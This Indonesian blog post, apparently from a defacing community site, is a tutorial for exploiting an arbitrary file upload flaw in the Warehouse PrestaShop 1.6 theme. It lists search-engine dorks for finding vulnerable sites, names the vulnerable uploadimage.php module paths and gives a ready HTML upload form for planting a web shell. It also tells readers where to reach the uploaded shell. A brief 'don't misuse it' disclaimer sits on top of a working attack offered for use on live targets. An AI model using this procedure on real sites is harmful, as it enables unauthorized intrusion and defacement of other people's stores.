07/03/17 - Defa Squad

Tempat Belajar Deface

Post Top Ad

Monday, July 3, 2017

Tutorial Deface : Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload

July 03, 2017 0

halo bertemu lagi dengan saya ,uyulcrack.. 
udah lama nih ga upload,,, biasa terlalu sibuk di dunia nyata. 
oke,, lanjut saja nih Tutorial Deface eXploit Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload . *exploit baru nanti dijelaskan dibawah. 
Dan makasih juga untuk bang People_hurt untuk live targetnya ....


Langsung ke tutor


#- Title: Joomla Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload
#- Author: people_hurt
#- Published : 21/06/2016
#- Developer : iqit-commerce
#- Link Download : themeforest .net/item/warehouse-responsive-prestashop-16-theme-blog/3178575
#- Fixed in Version : -
#- Tested on : windows , Linux , Other

Dork:
inurl:"/modules/simpleslideshow/"
inurl:"/modules/productpageadverts/"
inurl:"/modules/homepageadvertise/"
inurl:"/modules/columnadverts/"


masih bisa dikembangkan, cari /modules/namamoduleyglaen *Use your brain br0

1. disini gua jelasinnya lu pada udah ada CSRF nya ya jadi langsung praktek aja, pertama cari dulu target lwt Dorking di Search Engine 


2. kalo dah ketemu masukin deh exploit nya satu-satu sampe ketemu ERROR
Exploit &poc : 
- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php
- dan lain"
(TERGANTUNG PAS DORKING namamodule NYA)

3. Vulnerability ~ dari kemaren sih, kalo gak error ya Blank *kalau ada cth yg lain yg menandakan vuln pada eXploit ini, silahkan ksh tau dikolom komentar


target.coli/[path]/modules/namamodule/uploadimage.php

4. nah dibawah ini CSRF nya, masukin aja sourcodenya dan ubah format ke HTML

CSRF: 

<form method="POST" action="target.co.li/modules/namamodule/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>

5. kalo udah buka deh CSRF nya pake browser kesukaan sobat 

Upload File/Shell Lu

6. kalo sukses upload bakalan kayak gini


Muncul Nama Shell/File yg Lu Upload

7. akses shell target.co.li/modules/namamodule/slides/namashellLu 


target.coli/[path]/modules/namamodule/slides/namashellLu

nah setelah itu terserah sobat dah maudiapain, saran dari gua sih titip file aja ama laporin bugnya, jangan salah digunainyaa , gua cuman share apa yang gua bisa dan live praktek gua sendiri jadi kecelakaan ditanggung oleh situ bukan pengarang .... 

Semoga bermanfaat & Membantu Sobat..
sampai ketemu lagi BAAAYYYYY .....

sumber -> http://www.tkjcyberart.org/2016/06/warehouse-responsive-prestashop-16.html?showComment=1499089415483#c901394217216007402
Read More

Post Top Ad